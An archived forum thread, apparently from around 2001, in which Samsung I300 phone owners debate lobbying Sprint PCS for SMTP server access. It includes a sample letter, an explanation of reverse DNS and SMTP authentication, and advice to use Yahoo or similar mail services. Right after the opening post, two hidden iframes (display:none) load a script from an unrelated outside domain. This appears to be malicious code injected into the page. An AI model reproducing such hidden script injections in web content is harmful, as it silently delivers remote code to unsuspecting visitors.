+ Reply to Thread

How to access SMTP with Sprint PCS

After calling Sprint and trying to find a way to access their SMTP server, I was given a name and address of who to contact about allowing us to have access Sprint SMTP server.

If you would like to help me convince sprint to allow us to acces the SMTP so we can send emails from our phones send a letter explaining our dilema and how we need access to the SMTP server. The address is:

Antonio Castianio
    Sprint PCS
    P.O. Box 8077
    London, KY. 40742

Please help me in my battle to be able to send emails from my phone by sending a letter!!!

Thanks for all the help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

im all for it... however, im not good at sending out "corporate letters".. if yuo could, say, put up a template leter that i could go by that would help me out..

:p

Good idea Marc. Post a template and we can all download it, sign it, and send it off.

Silly question though, what is the advantage of doing this? Why not just use Eudora (or something similar) and utilize existing SMTP email services that we already have? What am I missing?

Craig

Administrator

Arrow

i agree.. i am using gopherking.com to access my MSN andi pay 20/year to use the service.. which is actually great.. i was using it back in the 605 days... but most folks on here dont want to pay for the service..

I think I am still missing something.

I have Prodigy and also Ureach. They both allow SMTP access using for example Outlook Express. I downloaded Eudora for my i300, and access these mailboxes that way. Why would I need to access Sprint's SMTP server?

Craig

Administrator

Arrow

Originally posted by csherman
    I think I am still missing something.

I have Prodigy and also Ureach. They both allow SMTP access using for example Outlook Express. I downloaded Eudora for my i300, and access these mailboxes that way. Why would I need to access Sprint's SMTP server?

Craig
    perhaps most folks are not aware of that...

sounds like a FAQ entry to me...

Geez, I am LOST!!!!

:o

smtp

Actually, I spoke to Tony. That guy sucks. He doesn't even know what smtp is

Craig:
    I think this came up in another thread. I am not sure if Prodigy and UReach allow you to send SMTP mail when you are not connected thru their dial up service.

Some ISPs only allow users/computers that connect to their network to use thier SMTP server. It is a way to cut down on open SMTP relays that are commonly used by spammers to send their junk.

The 2 most common (AFIK) ways an ISP use to allow you to send email (or use any services on their network) is reverse DNS or authentication. When you connect to the internet either via a dial up or even a broadband connection, your ISP assigns your computer a name on thier domain. So if you dial Earthlink, when you connect a DHCP server assigns your computer an IP address on the internet and a NAME. (ie yourcomputer.earthlink.net). Then when you send mail to their SMTP server, the SMTP server takes your IP address and looks it up to see your name..... and if your name does not end with earthlink.net...... you are denied a connecton. This is called reverse DNS. The other way a provider can allow you to connect is with some sort of authentication. Most POP3 servers (all I know) authenticate your user name and password when you connect to the server to download your mail. this is why you can usually access your POP3 mailbox from anywhere as long as you are connected to the internet. So the question becomes "why not use authentication for SMTP?" My best guess is to prevent someone from getting a real account from an ISP and then sharing the authentication info with his/her spamming buddies. The ISP can control the spammers better w/reverse DNS.

I hope this clears up the confussion. BTW, in my opinion, Sprint, as the ISP should provide it's customers (US) and SMTP server to use. Verizon does. Luckily I have my own SMTP server which I use authentication with, but I feel for you guys who do not have the luxury. Eudora mail on the i300 is great. For years I used to lug my laptop home so I could check my mail last thing at night and first thing in the AM (as the coffee brews). Now, I just use my phone. If I am stuck in traffic, I check my email..... it is by far for me the best use of the phone.

Carl

Hello all,

I just wanted to refresh this post for some of the new I300 owners. I still need your support. You can help by sending a letter to:

Antonio Castianio
    Sprint PCS
    P.O. Box 8077
    London, KY. 40742

explaining how we need access to the Sprint PCS SMTP server in order to be able to send emails directly from the I300.

If he recieves enough letters things may change!!!! So, please take 10 minutes and wright a letter.

Thanks

Re: How to access SMTP with Sprint PCS

Originally posted by nick
    After calling Sprint and trying to find a way to access their SMTP server, I was given a name and address of who to contact about allowing us to have access Sprint SMTP server.

If you would like to help me convince sprint to allow us to acces the SMTP so we can send emails from our phones send a letter explaining our dilema and how we need access to the SMTP server. The address is:

Antonio Castianio
    Sprint PCS
    P.O. Box 8077
    London, KY. 40742

Please help me in my battle to be able to send emails from my phone by sending a letter!!!

Thanks for all the help.
    Here is mine, for those that would like to plagerize....

Mr. Antonio Castianio
    Sprint PCS
    P.O. Box 8077
    London, KY. 40742

December 28, 2001

Dear Mr. Castianio,

I understand that you are the person to contact regarding this issue. As an owner of the Samsung SPH-I300 phone, I believe it would make a great deal of sense for Sprint PCS to offer its customers access to its SMTP server. This would facilitate the sending and receiving of email, something featured on Sprints web site where this particular phone is sold.

Please consider the needs of these and future customers of Sprint PCS by offering this feature as soon as possible.

Thank you for your time.

Why bug SprintPCS?

Ok, i'm looking at these requests with one big question on my head. Why aren't you guys using a public mail server like @yahoo.com?

Yahoo, and other ISPs, provide POP & SMTP access if sign up for an account. It's free, and you get your own email address, and you can download your email via POP3, and send messages via SMTP.

Quite a few mail servers will also let you use their SMTP server from any location if you:
    1. Have an account with them
    2. Login via POP before you try to send an SMTP message OR
    3. Authenticate with ESMTP

Sprint already provides the wireless web email function with a @sprintpcs.com email address. What more do you want them to do? Set up a public SMTP server, which costs them extra money to maintain and secure, and only applies to a small subset of their customers (the i300 owners). Doesn't make much business sense to me.

IMO, Sprint is doing a fine job with respect to their wireless web email service.

Administrator

Arrow

i aggree... sprint is llight years ahead in the wireless age than any other wireless carrier now....

i have been using yahoo since '95 and i have been abel to access my email thru the pqa's in the sprints web... i have a few other emails and i can reach them thru gopherking. i have never had a issue with the emai..

yahoo or hotmail are 2 very good choices!

Marc:
    Do you have to be on line to read your mail? I like the ability to download all my mail from my POP3 box into my phone. I can read it, reply to it, mark it for deletion and then next time I connect, the things I don't care about are zapped from the server. Messages I need to save are downloaded to my laptop the next time I fire it up. It is SO simplistic. (like the guy using it). I do not sync my mail between my laptop (I use a laptop exclusivly) and the i300. I just do not see the reason, at least for me.

I also agree Sprint is a better than average wireless carrier, I do think their customer service stinks. Ever try to return something? We have been charged on my corp AMX card AND our Sprint bill for certain accessories. Some stuff shows up, some does not, some is for the wrong phone. I have been billed. Got a post card saying my backordered extended bateries order was cancelled because 30 days had past. Ok, I found them on Samsung and got them in a few days.... Guess what shows up yesterday..... yup, the extended battery. I put it in the pile with the N300 case I did not order, and the EXTRA car charger that also showed up uninvited. My admin assistant is ready to kill me, and spends so much time trying to get it straightened out. She is so mild mannered, but swears at Clair. She has told both me and one of the guys that works for me..... no MORE telesales or Internet orders...... "go to the DAMN Sprint store around the corner" ...... yup, that was a quote.
    Carl

Administrator

Arrow

sure i conect to the net to dl my stuff and i do have to stay online... but i have 10,000 minutes to kill so i aint worried about that...

it seems some options are good for some and not so good for others...